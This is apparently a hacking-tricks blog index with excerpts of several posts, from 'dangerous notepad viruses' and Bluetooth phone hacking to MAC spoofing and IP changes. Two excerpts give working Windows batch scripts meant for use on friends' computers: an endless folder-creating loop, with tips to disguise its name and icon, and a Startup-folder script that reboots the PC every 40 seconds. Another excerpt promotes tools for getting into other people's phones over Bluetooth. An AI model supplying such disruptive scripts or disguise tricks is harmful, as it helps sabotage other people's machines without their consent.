Posts

Top 5 dangerous notepad viruses

Image
SOME DANGEROUS AND DEADLY  TRICKS [CAUTION]   DO NOT TRY THESE FOR FUN!! 1. How to create more than 3,000 folders under a minute 1) Open your notepad and type the following code. @echo off :top md %random% goto top 2) Save it as 1000.bat @echo off makes your screen appear blank but it is actually making hundreds of folders. md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos) goto top – return the command to :top, causes an infinite loop. NOTE: The folders will get created in the directory where you saved the ”1000.bat” file. The file might look suspicious to your friends . So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus.  ——————————————————————————— ——————————————————– 2. How to Shutdown a computer forever? Now Please don’t try this because this is the most simplest and deadliest hack fo...

How to hack via bluetooth

Image
 HEy,   Today i am sharing very interesting trick  that  how to hack  Bluetooth hacking  software  well you all are familiar with a term of hacking and now a days the people who are unaware of hacking losses their important data,  credit card  numbers and lots of other thing which are valueable.Well today I am sharing an interesting piece of hacking.People are amazed when they see hacker access a mobile phone with the Bluetooth and multimedia phones .But let me tell you its very simple. There are various hacks and lot of software  already available on the different website which helps hackers to hack any cell phone and multimedia phones.In this post that I have outlined only Some  Bluetooth Hacking Software  and because these softwares are very effective to access any phone.  And now here comes some of the softwares list of Bluetooth hacking software.  1) Super Bluetooth Hack  (awesome so...

Virus : Restart their computer continously......

Image
Hello guys This trick will help to prank on your friends... Simply paste this coding in notepad and save this as *.bat (ex: shut.bat). ................................................................................................... @echo     off echo message here shutdown /r /t 40 /c "HAVE FUN" ....................................................................................................  And the last step paste this file in following directory:- "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" Now your freinds computer will restart every time in span of  40 seconds. ANTIDOTE: Simply save this line in notepad as antidote.bat .......................................... shutdown /a .......................................... Then after restart, fastly click this file to abort one time restart And then delete this file from startup folder or given directory "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup...

Change or Spoof a MAC Address in Windows or OS X

Image
Heys Guys, On demand Every NIC (Network Interface Card)  has a unique MAC address ( Media Access Control ). This applies to all types of network cards, including Ethernet cards and WiFi cards. The MAC Address is a six-byte number or 12-digit hexadecimal number that is used to uniquely identify a host on a network. An example of a MAC address is 1F-2E-3D-4C-5B-6A and it falls into the Layer 2 networking protocol of the OSI model. In today’s networks, ARP, or Address Resolution Protocol converts a MAC address to a Layer 3 protocol address, such as an IP address. A MAC address can also be called a Physical Address . Read my post on how to find your MAC address if you don’t know it. All MAC addresses are hard-coded into a network card and can never be changed. However, you can change or spoof the MAC address in the operating system itself using a few simple tricks. So why would you want to change your MAC address? Well there are many reasons for this, ...

How to Determine or Find Your MAC Address

Image
Hey Guy, Find out mac address Do you need to figure out what your MAC address is? I’ll explain how to do that in this article! But first, here’s what a MAC address is (excerpt from Wikipedia ): “In computer networking a Media Access Control address (MAC address) is a unique identifier attached to most network adapters ( NICs ). It is a number that acts like a name for a particular network adapter, so, for example, the network cards (or built-in network adapters) in two different computers will have different names, or MAC addresses, as would an Ethernet adapter and a wireless adapter in the same computer, and as would multiple network cards in a router. However, it is possible to change the mac address on most of today’s hardware.” Windows MAC Address So what do you need to do to get your MAC address? It’s pretty simple actually! Let’s start off with getting a PC MAC address: 1. Click on Start and then click Run . In the text box, type in CMD . Click...

Change your IP Address in less than 1 Min

Image
 How to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.     Click on "Start" in the bottom left corner of the screen.     Click on "RUN"     Type in "command" and click OK       You should be now at MSDOS prompt Screen     Type "ipconfig /release" just like that, and press "enter"     Type "exit" and leave the prompt     Right-click on "Network Places" or "My Network Places" on your desktop.     Click on "properties"      Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.      Right click on "Local Area Connection" and click "properties"     Double-click on ...

How to check|Stop that Your computer HACKED or NOT

Image
  The  Computer hackers  can the cause serious damage to most of computer and may be your personal information.  Hacking can mean the number of things but the computer hacking is a basically when someone accesses into your computer or may be its resources. Without your permission and then initially may be without your knowledge.  Computers  can be the hacked without leaving any evidence behind that. As the home user and you can always find out that if you have been hacked by the black hat hackers because the black hat hacker either wants keep using your personal computer resources or may be want to harm the computer. As the black hat can try to access your computer. So as I am  security Researcher  it’s my duty to stop the black hat hacker from the unethical work and also inform to the people about the all activity of those person. So here is simple trick that how you can check your computer that may  hacked by hackers ....